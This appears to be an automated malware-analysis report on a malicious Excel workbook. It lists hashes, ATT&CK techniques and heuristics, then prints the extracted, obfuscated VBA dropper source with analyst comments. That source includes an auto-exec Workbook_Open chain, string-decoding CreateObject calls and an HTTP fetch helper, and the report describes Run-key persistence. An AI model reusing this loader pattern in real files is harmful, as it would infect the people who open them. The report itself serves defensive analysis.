Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d265dff9438345d1…

MALICIOUS

Office (OOXML)

Size: 22.0 KB · Created: 2010-07-22 03:25:32 UTC · Authoring application: Microsoft Excel 12.0000 · First seen: 2021-10-26
MD5: b4d10b14b344309ab9d08a7c2f118f2a
SHA-1: 6c2dfec3f7b886367a953c13f67855962ba09666
SHA-256: d265dff9438345d1d732b1a2385faf6401105eaff4be736fdf4ebc89d46a6a91
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1566.001 Spearphishing Attachment · T1203 Exploitation for Client Execution

The sample is an Office document containing a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated and uses CreateObject to instantiate objects, indicating an attempt to download and execute a secondary payload. The heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' strongly suggests this behavior. The macro also attempts to write to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy for persistence.

Heuristics (7)

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7266 bytes
SHA-256: 2d62567e48ae022488a17feb02becadafd3282571751085375d01c4cf04a029b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-exec entry point: Excel runs Workbook_Open when the workbook is opened
' (heuristic OLE_VBA_WBOPEN). It performs no work itself and only starts the
' call chain l1l11 -> l11l, so neither CreateObject nor any network member
' appears in the ThisWorkbook module; the real logic lives in Module1.
Private Sub Workbook_Open()
Call l1l11
End Sub
' Pure indirection layer: forwards to l11l (defined in Module1). Its only effect
' is to add one more hop between the auto-exec handler and the working code.
Private Sub l1l11()
Call l11l
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Option Explicit
' Win32 Sleep imported from kernel32: PtrSafe/LongPtr form for VBA7 (64-bit
' capable) hosts, legacy Declare otherwise. No call to Sleep occurs in the
' visible portion of the extracted source; it may be used in the truncated
' remainder or be unused.
#If VBA7 Then
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal l1l1ll As LongPtr)
#Else
Public Declare Sub Sleep Lib "kernel32" (ByVal l1l1ll As Long)
#End If
' Main routine reached from Workbook_Open via l1l11. Every string literal in
' this module is first passed through l1lll(key, blob); l1lll is not in the
' visible listing, so the decoded ProgIDs, request strings and message texts
' cannot be recovered from this page — treat each l1lll(...) as an opaque
' decoded string (heuristic OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER).
Sub l11l()
Dim l111l1, l11ll1
' l11ll1 is declared but never used in this routine.
' Three CreateObject calls assign the same variable, so only the object from
' the third call survives; whether the first two are probes or decoys cannot
' be told without decoding their ProgIDs.
Set l111l1 = CreateObject(l1lll("canabsvpfq", "fI;{>IY%B:x>4,"))
Set l111l1 = CreateObject(l1lll("mftgewxkye", "jt<;4?~>G)1=Xy9j8I}AK816"))
Set l111l1 = CreateObject(l1lll("nsaysbqthb", "'zy27BHOT 6(/E"))
' l1l1 (below) fetches and transforms remote content. l1ll1 and l11ll are not
' in the visible listing, so what is done with the fetched data — presumably
' the execution/persistence step the report's heuristics describe — cannot be
' confirmed from this page.
If l11ll(l111l1, l1ll1(l1l1(l1lll("tnitkbczkm", "/028BCTBE:C3")))) Then
' Both branches end in a MsgBox with decoded text, consistent with a decoy
' message shown to the user; confirm by decoding.
MsgBox l1lll("ysdbikqnba", "/x6G/E1D>1>?TUAH0:=7.B@GA-=I>2)OX73?A34F\V%CAFR@B1)=GAC>*,&?5@/6R&H>@6(:LA@5IM):;:H)5LE/F7V2IW<A>9@6-1GK*9%;1D8)`"), vbOKOnly, l1lll("kdtlrlyqqj", "h|854=H2;EFn=0'G")
Else
MsgBox l1lll("ogvqitwyfc", "e/3N(F0U::IMN`MNF:9B0DE@W;1LJ8$TY,E89<GAPL&0DIW'M.9:N:D=;(/JC::BX<H:K8*?EWN)LY/5@;=;.DNBA+L36Z?F%D=F4*HJ;5.F?>C5f"), vbOKOnly, l1lll("ofilmzlyso", "*&-)428;2;TpH+(0")
End If
End Sub
' Builds a request string from a decoded literal plus Replace substitutions,
' fetches it through l11l1, and post-processes the response body with three
' further Replace passes before returning it. The argument l111l1 is only
' tested for Null; its value is never otherwise used in this function.
Function l1l1(ByVal l111l1)
Dim l1l1l1, l1l111
' Base string: decoded, then one decoded token swapped for another.
l1l111 = Replace(l1lll("yojvdtvpbg", "flqn66\Yb>/No;4H47):L9K)@>N=3Od5>4P4(0%R4*E5%MAb%2&F=4'RZdZ;8;BYK5-0bMLM"), l1lll("kggkddkcko", "zk"), l1lll("kdtlrlyqqj", "S]"))
' Guard: l11l1 is called here with one substitution applied (result only
' tested for Null) and again below with a different substitution to obtain
' the body — two requests, possibly to different targets.
' NOTE(review): l11l1 leaves its result unassigned (Empty, not Null) on a
' non-200 status and IsNull(Empty) is False, so this guard does not actually
' detect a failed fetch.
If (IsNull(l111l1) = False) And (IsNull(l11l1(Replace(l1l111, l1lll("swppevpbuh", "Mgh\"), l1lll("fduuhpyrjv", "ACJH")))) = False) Then
l1l1l1 = l11l1(Replace(l1l111, l1lll("uvnhkqpudg", "}`mZ"), l1lll("kdtlrlyqqj", ":8CF")))
' Three token substitutions applied to the fetched text before it is
' returned; the search/replacement tokens are decoded and not recoverable
' from this page.
l1l1l1 = Replace(l1l1l1, l1lll("lmteimkxkv", "^u"), l1lll("btnxhrjinh", "tK"))
l1l1l1 = Replace(l1l1l1, l1lll("xppxvduekt", "mG"), l1lll("rqgwdxdvcw", "u"""))
l1l1l1 = Replace(l1l1l1, l1lll("kggkddkcko", "-R"), l1lll("jvgxttthwi", "N|&#ihv$"))
Else
' Decoy/error message path; l1l1l1 stays Empty and is returned as such.
MsgBox l1lll("mqdsfnqjzw", "S 5C9<=UMGC:OYZ<D)-60YC2Y3;>F6;MX=D7O';8eC*=7HW-=9@<CK:J;;<D0;3OF:7.?8?=7YF3>U-L9:N:-Z968@C7CM>F+4HM);>W;H;@,?<BT"), vbOKOnly, l1lll("mxdijjunle", "s{-(6>A488R~Q/.:")
End If
l1l1 = l1l1l1
End Function
' HTTP fetch helper. The object's ProgID is decoded, but the members used on
' it — Open(method, target, async), send, Status, ResponseText — match the
' XMLHTTP-style request interface, which makes l11ll1 the request target and
' the decoded first argument to Open the HTTP verb (confirm by decoding).
' This is the "download" behaviour the report attributes to the sample.
Function l11l1(l11ll1)
Dim l1ll11, l11l1l
Set l1ll11 = CreateObject(l1lll("ogvqitwyfc", "a%!'s \c~w##))}"))
' Synchronous request: third argument (async) is False.
l1ll11.Open l1lll("ljsrgubjyp", "&ll."), l11ll1, False
l1ll11.send
If l1ll11.Status = 200 Then
' Response body is returned only on HTTP 200.
l11l1l = l1ll11.ResponseText
l11l1 = l11l1l
Else
' No return value is assigned on this path, so the function result stays
' Empty (not Null) — relevant to the IsNull guard in the caller l1l1.
MsgBox l1lll("obxnxvydti", "B14R*D)I=<<:F[O@5-218D7?M9;A=;6TP71@?(A6bK&/1DZ1S0.;R<B6/+1=025DJ+;3:@*1DML3AL2G@2H'6J:<6=K35G:I/J?;8,FC/809,6>7X"), vbOKOnly, l1lll("qmjnyrnbqi", "e"">'F<A6,9DhD.9.")
End If
End Function
Function l1ll()
Dim l1111l As Variant
Dim l11lll As Long
Dim l111l1 As String
Dim l1l111 As Integer
l1l111 = 10
l1111l = Array(l1lll("btnxhrjinh", "@4"), l1lll("jujcrmgxll", "#:"), l1lll("xhvuwojbwt", "`3"), l1lll("obrlwfgmkx", "p/"), l1lll("zaclgtrmvd", "W;"), l1lll("hdnovcumlg", "L/"), l1lll("ryayysavai", "T3"), l1lll("jrokokvmya", "[5"), l1lll("ogvqitwyfc", "*A"), l1lll("ogvqitwyfc", "bB"), _
l1lll("nsaysbqthb", "N/"), l1lll("hdfkahxtvj", "]@"), l1lll("hcjxpsxrml", "`8"), l1lll("xppxvduekt", "k3"), l1lll("vjumfxnqkc", "OB"), l1lll("kmsetfqoul", "xA"), l1lll("ljsrgubjyp", "/7"), l1lll("kmsetfqoul", "fC"), l1lll("yojvdtvpbg", "dI"), l1lll("vjumfxnqkc", "IG"), l1lll("bfyrbuuqle", "pK"), l1lll("jujcrmgxll", "oN"), l1lll("vjumfxnqkc", "lJ"), l1lll("obrlwfgmkx", "NC"), _
l1lll("lmteimkxkv", "*P"), l1lll("obrlwfgmkx", "uE"), l1lll("jrokokvmya", "M\"), l1lll("awlzqrivqs", "`["), l1lll("uqbqlfclmg", "jc"), l1lll("jukgkrspcx", "aa"), l1lll("tzhqpadaiw", "fV"), l1lll("fduuhpyrjv", "Io"), l1lll("xhvuwojbwt", "se"), l1lll("ry
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 27136 bytes
SHA-256: 43f7a7b48c6686c9152732da01e53b693b5eafadbb7bb2b64d09bf863acc2859